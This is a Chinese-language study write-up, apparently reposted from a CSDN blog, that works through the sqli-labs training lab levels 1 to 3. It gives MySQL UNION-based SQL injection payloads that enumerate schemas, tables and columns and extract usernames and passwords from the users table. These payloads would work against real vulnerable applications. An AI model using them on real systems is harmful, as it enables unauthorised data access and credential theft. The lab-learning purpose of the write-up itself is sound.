ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

sqil-labs摸坑历程

2022-02-10 19:35:34  阅读:278  来源: 互联网

标签:sqil group name labs concat 历程 id select schema



title: sqil-labs摸坑历程
date: 2022-02-10 13:44:44
tags:
cover: https://s2.loli.net/2022/02/08/mfnMdVakLjGXFYA.png

前言

又是被迫做Noob一天@@
1先摘抄一段学习大佬内容(仅以提醒自己知识点)
mysql注入必懂的知识点 1)在mysql5.0版本以上中,存在一个自带数据库名information_schema自带 记录所有数据库名 表名 列名 2)数据库中符号“.”代表下一级,如user.user表示数据库user下的user表 3)information_schema.tables:记录所有表名信息的表 4)information_schema.columns:记录所有列名信息的表 5)table_schema:数据库名 6)table_name:表名 7)column_name:字段名 8)group_concat(table_name):查询所有的表 9) 猜解多个数据:limit x,1 (变动x) 10)注释符:-- (后面有空格)(也就是–+) ,/**/ , payload结尾单引号闭合
原文链接:

less-1 ’ 字符注入

**1:**根据提示,判断类型
id=1,正常
id=1'错误
id=1'--+页面回显正确
把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入
可以判断了:单引号字符注入
无泪开始数据库没链接上?我说难道我的firefox和别人的不一样?@
这里黄色字体是因为在Less-1脚本里加了个echo $sql;
image.png
好的,接下来可以进行下一步
**2:**order by 表中列查询
image.png
4就查询不到了,应该有三列
**3:**查询一下数据库的显示位(如果显示位确定,只能通过这个显示位来显示查询数据?)
使用union select 1,2,3联合查询语句查看
image.png
说明页面有2个显示位
4: 利用sql查询语句爆破出数据库内的数据库西信息
?id=888’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
数据库名查询语句
image.png
**5:**查询security内的所有表名
union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+
image.png
**6:**爆破出列名
?id='union SELECT 1,2,(select group_concat(column_name) from information_schema.columns where table_name=‘users’)%23
image.png
7: 爆破字段内容:?id='union SELECT 1,2,(select group_concat(username,0x3a,password) from users)%23
image.png
0x3a就是一个:,用16进制表示了,为了区分一下账号和密码,增加可视化

less-2 GET-Error based-intiger based(基于错误的GET整型注入)

**1:**整型数字可以直接查询,共有三个字段image.png
Less1的爆破语句此处也都可以使用了
**例子:**数据库名语句查询
?id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
**注意:**id要写成’0‘或负数

image.png

Less-3 GET-Error based-Single quotes with twist-string (基于错误的GET单引号变形字符型注入)

输入id=1测试,页面回显正常
输入id=1’测试,根据报错信息分析id格式
image.png
可以得知id格式为id=(‘1’),要有闭合括号和单引号

数据库查名:
?id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

image.png
由此,由联合语句可以进行爆破了
http://127.0.0.1/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users order by id -- a
image.png

标签:sqil,group,name,labs,concat,历程,id,select,schema
来源: https://blog.csdn.net/weixin_63957412/article/details/122850451

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有